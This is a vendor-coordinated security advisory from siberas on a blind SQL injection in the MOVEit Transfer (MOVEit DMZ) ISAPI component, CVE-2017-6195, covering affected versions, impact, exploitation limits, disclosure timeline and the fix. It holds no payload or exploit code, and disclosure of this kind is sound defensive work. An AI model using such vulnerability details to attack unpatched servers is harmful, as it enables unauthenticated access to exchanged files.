siberas security advisory SSA-1705 ======================================================================= title: SQL-Injection product: MOVEit Transfer aka MOVEit DMZ homepage: https://www.ipswitch.com/secure-information-and-file-transfer/moveit-transfer vulnerable versions: MOVEit Transfer 2017 <9.0.201, MOVEit DMZ <8.3.0.30, <8.2.0.20, <8.2.X CVE: CVE-2017-6195 impact: critical found by: Andreas Schmidt Advisory History ----------------------------------------------------------------------- 05/20/17 - Version 1.0 - Initial write-up Product/Vendor Description ----------------------------------------------------------------------- Source: https://www.ipswitch.com/secure-information-and-file-transfer/moveit-transfer "Our Managed File Transfer software provides controlled movement of critical data between partners, people and systems to assure data security and regulatory compliance." "Thousands of IT teams depend on MOVEit Transfer, formerly MOVEit File Transfer (DMZ), to secure files at rest and in transit and assure compliance with SLAs, governance and regulatory mandates." Impact ----------------------------------------------------------------------- An attacker can exploit this vulnerability to compromise accounts and thus download nearly every exchanged file without prior authentication. Even if client- certificate authorization has been enabled, the vulnerable function can still be reached. In special installation scenarios it might even be possible to execute code or to fully compromise the system. Vulnerability Description ----------------------------------------------------------------------- A (blind) SQL-Injection vulnerability has been identified in the moveitisapi.dll of the MOVEit Transfer product of ipswitch. The overall impact this vulnerability depends on the type and configuration settings of the database. The MOVEit Transfer product ships with a MySQL database. But it can also be configured to use a MSSQL DB. By default it is configured to use the MySQL DB. The default user rights of the DB user ‘moveitdmz’ are also very limited, e.g. it is not possible to perform any actions on the filesystem like ‘select into outfile’. By default the exploitation of the vulnerability is further limited because no query stacking is possible and the injection location resides within a select query. So no modifications of DB tables are possible, thus no combinations of the DB commands like select and insert are possible. Despite all those limitations the vulnerability is still critical - see Impact section above. Further details on how to exploit this vulnerability will be published later on our blog https://www.siberas.de/blog - stay tuned! Proof Of Concept ----------------------------------------------------------------------- We provide a test module in our webapplication toolbox aka watobo http://watobo.sourceforge.net Reporting Timeline ----------------------------------------------------------------------- 2016-12-19: Send information about vulnerability to vendor 2016-12-22: Vendor confirmed POC 2017-01-03: Fixed version provided to siberas by vendor - w/o a license key :/ 2017-01-05: Got license key from vendor 2017-01-09: siberas verified the fixed version 2017-03-??: Customers got a private alert from vendor 2017-05-18: CVE-2017-6195 published Solution ----------------------------------------------------------------------- Update your servers - asap! Check out the references here: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6195 Advisory URL ----------------------------------------------------------------------- https://www.siberas.de/en/advisories.html ======================================================================= siberas GmbH Germany Offices: Stuttgart, Ulm siberas GmbH is a team of IT Professionals specialized in security assessments and penetration tests which provides competent and vendor independent consulting services. Our aim is to unveil security vulnerabilities in IT Systems and Applications and to recommend appropriate measures in order to sustainably improve your general level of security. ----------------------------------------------------------------------- WE ARE HIRING ----------------------------------------------------------------------- Interested to work with the experts of siberas? Send us your application to jobs@siberas.de PGP/FP: C764 934C C8D3 1AC4 FA50 AD8D 7A48 1A88 54E9 2AA8 More infos at https://www.siberas.de/jobs.html -----------------------------------------------------------------------